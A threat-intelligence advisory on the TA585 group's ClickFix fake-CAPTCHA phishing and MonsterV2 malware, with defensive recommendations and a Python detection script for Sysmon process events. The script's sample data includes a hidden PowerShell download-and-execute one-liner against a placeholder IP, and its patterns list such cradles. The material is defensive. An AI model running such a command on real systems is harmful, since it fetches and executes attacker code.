
TA585 Leverages ClickFix Technique and MonsterV2 Malware

Red | Actor Report


Summary

The financially motivated cybercriminal group TA585 has been targeting the finance and accounting sectors in the United States throughout 2025, using social engineering and ClickFix-based infection chains to deliver the MonsterV2 malware. The group's campaigns frequently impersonate U.S. government agencies such as the IRS and the Small Business Administration (SBA) to deceive victims and establish credibility.

Operating as a vertically integrated cybercrime entity, TA585 controls its entire attack infrastructure, including email delivery systems, malware hosting servers, and payload deployment mechanisms, providing operational autonomy and resilience.

The group employs multiple malware families—including MonsterV2, Lumma Stealer, and Rhadamanthys—to conduct credential theft, data exfiltration, and remote access operations. MonsterV2, a Malware-as-a-Service (MaaS) platform priced between $800 and $2,000 per month, is TA585's preferred payload because of its modular capabilities and built-in geo-fencing that excludes Commonwealth of Independent States (CIS) countries from infection.


Actor Details

TA585 differentiates itself from typical cybercriminal operations through complete self-managed control of its attack chain, allowing the actor to maintain stealth and efficiency while minimizing external dependencies.

Key Techniques and Tactics

  • Government-Themed Lures: The group sends phishing emails impersonating U.S. government institutions, often using subjects related to taxes or compliance.
  • GitHub Abuse for Delivery: TA585 abuses GitHub notifications by @-mentioning legitimate accounts within repositories, which prompts GitHub to send genuine notification emails from its own domain. These emails carry the malicious links, so the campaign borrows GitHub's trusted domain reputation to get past email security filters.
  • ClickFix Infection Technique: Victims are directed to a malicious webpage displaying a fake CAPTCHA prompt, instructing them to press Win+R and execute a PowerShell command. This manual interaction bypasses browser-based security restrictions and endpoint detection mechanisms.
  • CoreSecThree Infrastructure: The lure webpage maintains continuous communication (“beaconing”) with the attacker’s server. The final payload is delivered only when the MonsterV2 sample successfully checks in from the same IP address, ensuring precise targeting.
  • Malware Features:
    • MonsterV2: A premium MaaS RAT supporting credential theft, file exfiltration, webcam access, and remote control.
    • Lumma Stealer & Rhadamanthys: Deployed in parallel campaigns for data collection and financial credential harvesting.
    • SonicCrypt Crypter: Used for obfuscation and evasion.

TA585’s sophistication lies in its adaptability, technical automation, and the ability to manipulate trusted ecosystems like GitHub to deploy stealthy, precision-targeted malware against U.S.-based financial organizations.


Recommendations

  • User Awareness Training: Conduct security awareness programs to help employees recognize phishing attempts, especially those impersonating government agencies (IRS, SBA). Reinforce caution against executing PowerShell commands or interacting with fake CAPTCHA prompts.
  • Restrict PowerShell Access: Limit PowerShell usage to administrative accounts and apply group policies that prevent script execution via the Windows Run dialog (Win+R).
  • Enhance Email Security: Strengthen email filtering mechanisms to identify phishing campaigns leveraging legitimate services like GitHub. Continuously update filters using threat intelligence feeds.
  • Monitor Web Behavior: Deploy web content filters and monitor for suspicious JavaScript or CAPTCHA overlays indicative of ClickFix activity.
  • Advanced Endpoint Detection: Utilize EDR and NGAV solutions with behavior-based detection to identify encrypted or obfuscated payloads such as MonsterV2 or SonicCrypt-packed binaries.
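The "Restrict PowerShell Access" and "Advanced Endpoint Detection" recommendations above hinge on one observable: in the ClickFix chain the victim pastes a command into Win+R, so the interpreter is spawned directly by explorer.exe with hidden-window, policy-bypass or download-cradle arguments. The following is an added example, not Hive Pro's code; it scores constructed Sysmon-style process-creation records (field names follow Sysmon Event ID 1) against that pattern, and the IP in the sample is a TEST-NET placeholder, not an indicator from this advisory.

```python
import re

# Fields follow Sysmon Event ID 1 (Image, ParentImage, CommandLine). In the
# advisory's chain the victim pastes a one-liner into the Win+R dialog, so the
# interpreter is a direct child of explorer.exe.
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}
HIDDEN = re.compile(r"-(?:w|win|windowstyle)\s+hidden", re.I)
BYPASS = re.compile(r"-(?:ep|executionpolicy)\s+bypass", re.I)
CRADLE = re.compile(r"\b(?:iwr|irm|invoke-webrequest|invoke-restmethod|"
                    r"downloadstring|iex|invoke-expression)\b", re.I)
ENCODED = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I)

def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def score_event(event):
    """Return the suspicious traits found in one process-creation record."""
    cmd = event.get("CommandLine", "")
    reasons = []
    if (basename(event.get("Image", "")) in INTERPRETERS
            and basename(event.get("ParentImage", "")) == "explorer.exe"):
        reasons.append("interpreter spawned by explorer.exe (Win+R pattern)")
    for pattern, label in ((HIDDEN, "hidden window"), (BYPASS, "execution policy bypass"),
                           (CRADLE, "download-and-execute cradle"), (ENCODED, "encoded command")):
        if pattern.search(cmd):
            reasons.append(label)
    return reasons

def is_clickfix(event):
    """Require the Win+R parent pattern plus at least one evasion or download
    marker, so an interactive PowerShell launch from the Start menu is not flagged."""
    reasons = score_event(event)
    return any("Win+R" in r for r in reasons) and len(reasons) >= 2

def triage(events):
    """Return (ProcessId, reasons) for every record matching the ClickFix pattern."""
    return [(e["ProcessId"], score_event(e)) for e in events if is_clickfix(e)]

# Constructed sample records; 203.0.113.10 is a TEST-NET placeholder, not a real IoC.
PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
SAMPLE_EVENTS = [
    {"ProcessId": 4120, "ParentImage": "C:\\Windows\\explorer.exe", "Image": PS,
     "CommandLine": 'powershell -w hidden -ep bypass -c "iwr http://203.0.113.10/v.txt | iex"'},
    {"ProcessId": 4188, "ParentImage": "C:\\Windows\\explorer.exe", "Image": PS,
     "CommandLine": "powershell.exe"},                      # opened from the Start menu
    {"ProcessId": 4300, "ParentImage": "C:\\Windows\\System32\\svchost.exe", "Image": PS,
     "CommandLine": "powershell -ep bypass -File C:\\Scripts\\inventory.ps1"},  # scheduled task
]
```

Running `triage(SAMPLE_EVENTS)` flags only process 4120; the Start-menu launch and the scheduled-task script share some traits but lack the combination the chain produces, which is the balance between coverage and false positives a detection rule for this advisory needs.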

Indicators of Compromise (IoCs)

SHA256 Hashes:


IPv4:PORT Indicators:



MITRE ATT&CK TTPs

Tactic               | Technique                                                                      | ID
---------------------|--------------------------------------------------------------------------------|-----------------------------
Initial Access       | Spearphishing Link; Trusted Relationship; Drive-by Compromise                  | T1566.002; T1199; T1189
Execution            | User Execution – Malicious Link; Command and Scripting Interpreter (PowerShell)| T1204.001; T1059.001
Persistence          | Boot or Logon Autostart Execution; Scheduled Task/Job                          | T1547; T1053
Privilege Escalation | Remote Services                                                                | T1021
Defense Evasion      | Obfuscated Files or Information; Masquerading; Disable or Modify Tools         | T1027; T1036; T1562.001
Credential Access    | Input Capture; Keylogging                                                      | T1056; T1056.001
Discovery            | System Information Discovery                                                   | T1082
Collection           | Data from Local System; Screen Capture                                         | T1005; T1113
Exfiltration         | Exfiltration Over C2 Channel                                                   | T1041
Command & Control    | Application Layer Protocol; Web Protocols                                      | T1071; T1071.001
Impact               | Hide Artifacts; Hidden Window                                                  | T1564; T1564.003
